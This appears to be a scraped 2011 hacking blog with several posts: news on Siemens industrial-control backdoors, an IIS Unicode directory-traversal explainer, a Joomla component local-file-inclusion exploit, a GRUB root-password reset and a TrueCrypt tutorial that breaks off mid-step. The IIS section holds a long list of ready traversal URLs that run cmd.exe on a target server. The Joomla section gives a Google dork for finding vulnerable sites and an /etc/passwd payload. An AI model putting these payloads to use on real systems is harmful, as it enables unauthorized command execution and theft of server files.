Go to Settings -> Forwarding and POP/IMAP and under POP Download, look for:

1. Status: POP is enabled for all mail that has arrived since "Your Account Creation Date"

and you will get the required date

Backdoors in Electronic Gadgets - Vulnerable even for a Script Kiddie

2011-08-22T11:34:00.000-07:00

Source : Washington Times

The computer systems that control vital industrial machinery in nuclear power plants, water treatment facilities and many other factories are vulnerable to deadly sabotage by hackers with even moderate skills, security researchers say.

Dillon Beresford, who works for security firm NSS Labs, showed at a security conference in Las Vegas how he had successfully hacked into special computer systems that are made by Siemens and other companies and are used in thousands of industrial plants.

The Siemens equipment that Mr. Beresford hacked, called Industrial Control Systems or ICS, is the same product targeted by Stuxnet, the sophisticated computer worm discovered last year to have crippled Iran’s nuclear program.

Stuxnet reprogrammed the computer-controlled centrifuges used to enrich uranium so that they spun out of control and destroyed themselves.

What Mr. Beresford’s work shows is “you don’t need Stuxnet to do real damage” to industrial plants, Vikram Phatak, chief technology officer ofNSS Labs, told The Washington Times.

Joe Weiss, a veteran consultant on ICS security for several industries, said the key issue was that Mr. Beresford was able to hack the equipment even with no experience with ICS systems, a small budget and limited time.

“You don’t have to be a nation state” to hack ICS systems, Mr. Weisssaid. “The game has fundamentally changed.”

Mr. Beresford, who devised the hacking technique over 2½ months in his bedroom, found a “back door” coded into the Siemens ICS system and several other security weaknesses. These vulnerabilities could allow a hacker with access to the computer network at the plant to shut down or even damage the machinery that the system controls, Mr. Phatak said.

“These systems were never designed with security in mind,” said a senior Homeland Security cybersecurity official, speaking on the condition of anonymity because of department ground rules.

“Traditionally, these networks were not connected” to the public Internet, the official said.

However, in recent years, demands for greater productivity prompted more and more companies to connect their industrial networks to other company networks linked to the Internet.

Mr. Weiss said that in more than a dozen vulnerability assessments he had completed for clients, he found in every case “at least one remote access point connecting an ICS system to the ‘outside world’ [his clients] didn’t know existed.”

A spokesman for Siemens stressed that the company has worked for months with NSS Labs, Homeland Security and their clients to fix the vulnerabilities.

He noted that one of the company’s computer-security specialists, Thomas Brandstetter, joined Mr. Beresford onstage for his presentation earlier this month at the Black Hat Security Conference in Las Vegas.

Last month, the Homeland Security Department issued a bulletin to critical infrastructure owners warning that the loose-knit Internet hacker collective called Anonymous had threatened attacks on U.S. and Canadian oil and gas companies.

Read More

Unicode Vulnerability and Directory Traversal

2011-08-22T08:12:00.000-07:00

IIS Unicode Vulnerability

By using malformed http requests a malicious user can traverse directories and execute arbitrary commands on vulnerable remote webservers running MS IIS (Internet Information Server). The Unicode representation of a directory delimiter (/) is used to bypass IIS security checks. A malicious user can escalate his/her privileges on the remote webserver which could be used to gain privileges commensurate with those of a locally logged-on user. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it.

All Windows machines supports Unicode, in order to encode various characters. A single Unicode character is encoded using two octets. In Internet Information Server (IIS) an ASCII character can be represented by a Unicode character by using the following representation:

%c0%hh -------- 0xhh

%c1%hh -------- 0x40 + 0xhh

"hh" is a hex value (strictly less than 0x40)

Therefore, to represent the character ‘/’, you would use the representation “%c0%2f”, since the character ‘/’ is ASCII character 0x2f. To represent the character ‘\’, you would use the representation “%c1%1c”, since the character ‘\’ is ASCII character 0x5c ( (0x40 + 0x1c) mod 0x80 = 0x5c).

Note: IIS Unicode exploitation is different for different language settings for a server. For Example: The above exploit doesn't work for US Servers. For US Servers, the following two Unicode Representations work:

%c0%af -------- ‘/’

%c1%9c -------- ‘\’

Normally, IIS checks URL strings to ensure that certain constructs do not occur. For example, the following string will be caught by the parser:
http://www.victimserver.com/scripts/..\../winnt/system32/cmd.exe?/c+dir

Obviously, the requester is attempting to access some parent of the “/scripts” directory, and IIS catches this and returns an HTTP 404 - File not found response. However, when the exact same request is made in the following form:
http://www.victimserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

The response is:

Directory of c:\inetpub\scripts

10/01/2001 03:46p

0 File(s) 0 bytes

2 Dir(s) 2,527,547,392 bytes free

When IIS receives a request referring to a script or executable, it performs URL decoding (converting %hh characters to their ASCII representations) and then performs a security check to ensure that the resulting script or executable path does not attempt to migrate out of the base share. Unfortunately, a second (unnecessary) URL decoding pass is then performed after this check. By specially crafting the URL, it is possible to essentially bypass the security check.

For example, the following URL:
http://www.victimserver.com/scripts/..%255c../winnt/system32/attrib.exe?c:\*.*

after initial URL decoding ("%25" converts into ‘%’) results in:
http://www.victimserver.com/scripts/..%5c../winnt/system32/attrib.exe?c:\*.*

This is passed to the security check, and it passes. Unfortunately, a second URL decode then occurs (converting the “%5c” into ‘\’) resulting in the following URL getting processed:
http://www.victimserver.com/scripts/..\../winnt/system32/attrib.exe?c:\*.*

This works because the IIS server first determines that the executable file is located under an executable share (ostensibly under the “/scripts” share). However, it is incorrect in this assessment, since the “..\..” portion of the URL indicates utilizing a parent share (the root share in this case) followed by the actual path to the executable. Nevertheless, it works.

At this point the attacker can see all files in the C:\ directory, whether hidden or not. This mechanism therefore (again!) allows an attacker to run any arbitrary executable on the victimserver system, even if the executable is outside of the public web directories.

List of Unicode vulnerabilities

/scripts/root.exe?/c+dir+c:\
/scripts/eyehack.exe?/c+dir+c:\
/scripts/sensepost.exe?/c+dir+c:\
/iisadmpwd/root.exe?/c+dir+c:\
/iisadmpwd/eyehack.exe?/c+dir+c:\
/iisadmpwd/sensepost.exe?/c+dir+c:\
/cgi-bin/root.exe?/c+dir+c:\
/cgi-bin/eyehack.exe?/c+dir+c:\
/cgi-bin/sensepost.exe?/c+dir+c:\
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir\
/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

Joomla Component Simple Download LFI Vulnerability

2011-08-20T06:15:00.000-07:00

Local File Inclusion:
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. A typical example of a PHP script vulnerable to LFI is as follows:

$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else

{
include("index.php");
}
?>

A legitimate request made to the script could look like this:

http://example.com/index.php?file=contactus.php

This is of little use to a potential attacker, who is more likely to be interested in the files outside the pages/ directory. To do this, an attacker could use LFI. The simplest example would be:

http://example.com/index.php?file=../../../../etc/passwd

Coming to Actual Exploit, Joomla CMS component simple download suffers from this type of LFI vulnerability.

Google Dork: inurl:index.php?option=com_simpledownload&controller=

exploit: ../../../../../../../../../../../../../../../etc/passwd%00

Tested Screenshot:

Backtrack Root password reset

2011-08-16T09:33:00.000-07:00

Reboot your computer. Wait for the grub screen... Press "ESC" when you're prompted.

Highlight the first option.

Press "e".

Highlight the kernel line.

Press "e".

Press "TAB". You'll get an error message.

Press "ESC".

Press "e" again.

Using your arrow keys, scroll back and change "ro" to "rw"

At the end of the line add: "init=/bin/bash"

Press "Enter"

Press "b"

Type at the prompt:" passwd root "

Enter the new password twice.

Press "CTRL+d" to cause a nice Kernel Panic. This will cause your system to hang.

Press and hold your power button till it shuts down. Power back up and let it boot into BackTrack normally.

Log in as root with your new password.

Encrypt your Data with TRUECRYPT

2011-08-12T04:02:00.000-07:00

Lock your USB stick,Hard-disk etc with TrueCrypt-A Open Source Encryption Tool

Step 1:

If you have not done so, download and install TrueCrypt.

Then launch TrueCrypt by double-clicking the file TrueCrypt.exe or by clicking the TrueCrypt shortcut in your

Windows Start menu.

Step 2:

The main TrueCrypt window should appear. Click Create Volume (marked with a red rectangle for clarity).

Step 3:

The TrueCrypt Volume Creation Wizard window should appear.

In this step you need to choose where you wish the TrueCrypt volume to be created.

A TrueCrypt volume can reside in a file, which is also called container, in a partition or drive.

In this tutorial, we will choose the first option and create a TrueCrypt volume within a file.

As the option is selected by default, you can just click Next.

Note: In the following steps, the screenshots will show only the right-hand part of the Wizard window.

Step 4:

In this step you need to choose whether to create a standard or hidden TrueCrypt volume.

In this tutorial, we will choose the former option and create a standard TrueCrypt volume.

As the option is selected by default, you can just click Next.

Step 5:

In this step you have to specify where you wish the TrueCrypt volume (file container) to be created.

Note that a TrueCrypt container is just like any normal file. It can be, for example, moved or deleted

as any normal file. It also needs a filename, which you will choose in the next step.

Click Select File.

The standard Windows file selector should appear (while the window of the TrueCrypt Volume

Creation Wizard remains open in the background).

Step 6:

In this tutorial, we will create our TrueCrypt volume in the folder D:\My Documents\ and the filename

of the volume (container) will be My Volume (as can be seen in the screenshot above). You may, of

course, choose any other filename and location you like (for example, on a USB memory stick).

Note that the fileMy Volume does not exist yet – TrueCrypt will create it.

IMPORTANT: Note that TrueCrypt will not encrypt any existing files (when creating a

TrueCrypt file container). If you select an existing file in this step, it will be overwritten and replaced

by the newly created volume (so the overwritten file will be lost, not encrypted).

You will be able to encrypt existing files (later on) by moving them to the TrueCrypt volume that we are creating now.

Select the desired path (where you wish the container to be created) in the file selector.

Type the desired container filename in the File name box.

Click Save.

The file selector window should disappear.

In the following steps, we will return to the TrueCrypt Volume Creation Wizard.

Step 7:

In the Volume Creation Wizard window, click Next.

Step 8:

Here you can choose an encryption algorithm and a hash algorithm for the volume.

If you are not sure what to select here, you can use the default settings and click Next

Step 9:

Here we specify that we wish the size of our TrueCrypt container to be 1 megabyte.

You may, of course, specify a different size.

After you type the desired size in the input field (marked with a red rectangle), click Next.

Step 10:

This is one of the most important steps. Here you have to choose a good volume password.

Read carefully the information displayed in the Wizard window about what is considered a good

password.

After you choose a good password, type it in the first input field. Then re-type it in the input field

below the first one and click Next.

Note: The button Next will be disabled until passwords in both input fields are the same.

Step 11:

Move your mouse as randomly as possible within the Volume Creation Wizard window at least for 30

seconds.

The longer you move the mouse, the better.

This significantly increases the cryptographic strength of the encryption keys (which increases security).

Click Format.

Volume creation should begin. TrueCrypt will now create a file called My Volume in the folder D:\My

Documents\ (as we specified in Step 6).

This file will be a TrueCrypt container (it will contain the encrypted TrueCrypt volume). Depending on the size of the volume,

the volume creation may take a long time. After it finishes, the following dialog box will appear:

Click OK to close the dialog box.

Step 12:

We have just successfully created a TrueCrypt volume (file container).

In the TrueCrypt Volume Creation Wizard window, click Exit.

The Wizard window should disappear.

In the remaining steps, we will mount the volume we just created. We will return to the main

TrueCrypt window (which should still be open, but if it is not, repeat Step 1 to launch TrueCrypt and

then continue from Step 13.)

Step 13:

Select a drive letter from the list (marked with a red rectangle). This will be the drive letter to which

the TrueCrypt container will be mounted.

Note: In this tutorial, we chose the drive letter M, but you may of course choose any other available

drive letter.

Step 14:

Click Select File.

The standard file selector window should appear.

Step 15:

In the file selector, browse to the container file (which we created in Steps 6-11) and select it.

Click Open (in the file selector window).

The file selector window should disappear.

In the following steps, we will return to the main TrueCrypt window.

Step 16:

In the main TrueCrypt window, click Mount.

Password prompt dialog window should appear.

Step 17:

Type the password (which you specified in Step 10) in the password input field (marked with a red

rectangle).

Step 18:

Click OK in the password prompt window.

TrueCrypt will now attempt to mount the volume.

If the password is incorrect (for example, if you

typed it incorrectly), TrueCrypt will notify you and you will need to repeat the previous step (type
